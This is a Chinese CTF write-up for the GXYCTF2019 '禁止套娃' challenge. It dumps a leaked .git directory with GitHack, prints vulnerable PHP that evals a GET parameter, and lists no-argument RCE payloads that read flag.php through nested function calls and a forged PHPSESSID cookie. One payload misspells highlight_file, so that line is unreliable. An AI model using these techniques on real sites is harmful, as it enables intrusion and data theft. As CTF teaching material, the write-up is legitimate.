本文主要是介绍一天一道ctf 第21天(无参RCE GitHack),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
[GXYCTF2019]禁止套娃
.git源码泄露,这里我用dirsearch是没扫出来这个文件的。
用GitHacker这个工具可以查看泄露的.git文件,linux里(我用的是kali)命令行输入git clone https://github.com/lijiejie/GitHack.git 下载,进入GitHack文件夹,命令行输入python GitHack.py http://e3899c1b-f6d8-4f65-8408-46b968e41c33.node3.buuoj.cn/.git/就能得到index.php文件
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>
三层过滤,第一个if过滤常用的伪协议,第二个if只能通过无参数的函数,第三个if过滤了一些常见的字符。执行语句是eval($_GET['exp']),说明是无参数RCE,通俗点来说就是因为过滤只能通过无参数的函数,所以我们要用函数套函数的方式找到flag,如a(b(c()))。也就是题目标题中说的禁止套娃的意思。
先看第一个payload:?exp=print_r(scandir(current(localeconv())));
localeconv() 函数返回一包含本地数字及货币格式信息的数组,该数组第一个元素是.,正好作为scandir()函数的参数
current() 函数返回数组中的当前元素的值
scandir()函数扫描目录
我们看到flag在倒数第二个数组元素里
因此我们用第二个payload:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
array_reverse()函数以相反的元素顺序返回数组
next() 将内部指针指向数组中的下一个元素
highlight_file()输出文件内容
ps.在网上还查到了其它几种读取flag.php的方法
?exp=hightlight_file(array_rand(array_flip(scandir(current(localeconv())))));
array_flip() 函数用于反转/交换数组中的键名和对应关联的键值
array_rand() 函数返回数组中的随机键名,只要多试几次就能返回flag
?exp=readfile(session_id(session_start()));
session_start()是让php开启session对话,session_id()返回session的ID
并且在请求头中设置cookie:PHPSESSID=flag.php, connection: keep-alive
这篇关于一天一道ctf 第21天(无参RCE GitHack)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
